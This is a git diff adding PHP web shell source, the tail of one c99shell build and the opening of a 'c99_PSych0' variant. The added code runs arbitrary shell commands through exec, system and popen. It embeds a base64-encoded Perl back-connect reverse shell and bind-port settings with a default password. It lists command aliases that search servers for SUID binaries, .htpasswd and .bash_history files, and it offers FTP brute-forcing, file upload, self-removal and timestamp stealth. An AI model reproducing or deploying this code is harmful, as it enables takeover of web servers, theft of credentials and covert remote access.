+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+ );
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/php/c99_PSych0.php b/php/c99_PSych0.php
new file mode 100644
index 0000000..0969b91
--- /dev/null
+++ b/php/c99_PSych0.php
@@ -0,0 +1,3284 @@
+<?php 
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0 pre-release build #16"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server 
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>C99 Modified By Psych0 </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"), 
+ array("<b>Tools</b>",$surl."act=tools&d=%d"), 
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"), 
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>Sec.</b>",$surl."act=security&d=%d"), 
+ array("<b>SQL</b>",$surl."act=sql&d=%d"), 
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"), 
+ array("<b>Update</b>",$surl."act=update&d=%d"), 
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"), 
+ array("<b>Self remove</b>",$surl."act=selfremove"), 
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") 
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+} 
+function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+} 
+function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+} 
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
